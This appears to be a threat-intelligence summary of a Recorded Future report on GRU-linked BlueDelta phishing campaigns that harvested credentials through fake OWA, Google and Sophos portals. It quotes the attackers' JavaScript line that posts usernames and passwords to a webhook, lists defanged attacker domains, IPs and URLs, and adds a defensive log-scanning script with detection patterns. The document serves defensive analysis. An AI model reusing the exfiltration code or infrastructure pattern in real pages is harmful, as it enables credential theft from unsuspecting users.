GRU-Linked BlueDelta Evolves Credential Harvesting

Recorded Future’s Insikt Group tracked BlueDelta credential-harvesting campaigns from February to September 2025 that impersonated Microsoft OWA, Google, and Sophos VPN portals and abused free hosting and tunneling services to capture and exfiltrate credentials. The campaigns targeted researchers and policy-linked organizations, using legitimate PDF lures and customized JavaScript for input capture, followed by redirection to the real sites to reduce detection and suspicion. #BlueDelta #MicrosoftOWA

Keypoints

  • BlueDelta (GRU-associated) expanded credential-harvesting operations across 2025, deploying OWA-, Google-, and Sophos-themed phishing pages.
  • The group abused free hosting and tunneling services (Webhook[.]site, InfinityFree, Byet Internet Services, ngrok, ShortURL) to host phishing pages, relay data, and manage redirections.
  • Campaigns used legitimate PDF lure documents from organizations like the Gulf Research Center and the EcoClimate Foundation to enhance realism and evade email security controls.
  • JavaScript-based input-capture and beaconing mechanisms collected usernames, passwords, URL-embedded target identifiers, IPs, and user agents before redirecting victims to legitimate sites.
  • Targets included individuals and organizations in Türkiye, Europe, North Macedonia, and Uzbekistan, indicating a focus on energy, research, defense cooperation, and government communications.
  • BlueDelta’s multi-stage redirection and reuse of disposable services demonstrate low-cost, stealthy tradecraft likely to continue into early 2026.

MITRE Techniques

  • [T1593] Search Open Websites/Domains – Used OSINT and targeted email discovery to identify victims and target addresses (‘Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank’).
  • [T1583.006] Acquire Infrastructure: Web Services – Abused free web services and hosting providers to host phishing pages and exfiltration endpoints (‘abused free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok’).
  • [T1056.002] Input Capture: GUI Input Capture – Captured credentials via browser-based JavaScript functions that sent usernames and passwords to attacker-controlled webhooks (‘JavaScript function used to send username and password to the attacker webhook before redirecting to the GRC PDF file’).
  • [T1071.001] Application Layer Protocol: Web Protocols – Exfiltrated harvested data using HTTP POST requests over web protocols (‘xhr.send(JSON.stringify({"username": username, "oldPwd": oldPwd}));’).
  • [T1102] Web Service – Leveraged third-party web services and APIs (Webhook[.]site, ngrok) to host content and relay stolen credentials (‘BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns’).
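The exfiltration pattern quoted above (an XHR POST whose JSON body carries "username" and "oldPwd", sent to a disposable webhook or tunnel host) is easy to hunt for in web proxy logs. The script below is an added defender-side example, not code from the Recorded Future report; the JSON log format, the source IPs, the webhook path and the credential values are constructed placeholders, and the suspect-domain list is seeded from the services the report names.

```python
import json
from urllib.parse import urlparse

# Disposable hosting/tunneling domains named in the report (extend with your own).
SUSPECT_SUFFIXES = ("webhook.site", "ngrok-free.app", "kesug.com", "my-board.org")
# Body keys seen in the quoted XHR payload ("username", "oldPwd") plus common variants.
CRED_KEYS = {"username", "oldpwd", "password", "pwd", "passwd", "user", "login"}

def host_is_suspect(host):
    """True if host is one of the suspect domains or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in SUSPECT_SUFFIXES)

def credential_keys(body):
    """Return the credential-like top-level keys found in a JSON request body."""
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return set()
    return {k for k in data if k.lower() in CRED_KEYS} if isinstance(data, dict) else set()

def scan_proxy_log(lines):
    """Flag POSTs to suspect hosts whose JSON body carries credential fields.
    Each line is a JSON record with src, method, url, body (assumed log format)."""
    alerts = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("method") != "POST":
            continue
        host = urlparse(rec.get("url", "")).hostname or ""
        keys = credential_keys(rec.get("body", ""))
        if host_is_suspect(host) and keys:
            alerts.append({"src": rec.get("src"), "host": host, "keys": sorted(keys)})
    return alerts

# Constructed sample log; the webhook path and credential values are placeholders.
SAMPLE_LOG = [json.dumps(r) for r in (
    {"src": "10.0.0.5", "method": "POST", "url": "https://webhook.site/<uuid-placeholder>",
     "body": json.dumps({"username": "j.doe", "oldPwd": "placeholder"})},
    {"src": "10.0.0.5", "method": "GET", "url": "https://webhook.site/<uuid-placeholder>", "body": ""},
    {"src": "10.0.0.7", "method": "POST", "url": "https://abcd-1234.ngrok-free.app/api",
     "body": json.dumps({"event": "ping"})},
    {"src": "10.0.0.9", "method": "POST", "url": "https://owa.example.com/auth",
     "body": json.dumps({"username": "j.doe", "password": "placeholder"})},
)]

if __name__ == "__main__":
    for a in scan_proxy_log(SAMPLE_LOG):
        print(f"ALERT {a['src']} -> {a['host']} fields={a['keys']}")
```

Only the POST to webhook.site with credential keys fires; the GET, the ngrok POST without credential fields, and the POST to the organisation's own OWA host do not, which keeps the rule focused on credential-shaped bodies leaving for disposable infrastructure.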

Indicators of Compromise

  • [Domains] Hosting and phishing infrastructure – account-security-googie[.]my-board[.]org, config-settings[.]kesug[.]com, and 4 more domains associated with free hosting services.
  • [IP Addresses] Hosting/resolution context – 172[.]111[.]206[.]103 (associated hosting), 185[.]27[.]134[.]125 (InfinityFree-resolved UK IP).
  • [URLs] Credential pages, webhooks, and exfiltration endpoints – hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4, hxxps://d3ef-2804-37f8-400-2cbf-4996-e46a-4802-5c08[.]ngrok-free[.]app, and 9 other URLs used for phishing, redirection, and data capture.

Read more: https://www.recordedfuture.com/research/gru-linked-bluedelta-evolves-credential-harvesting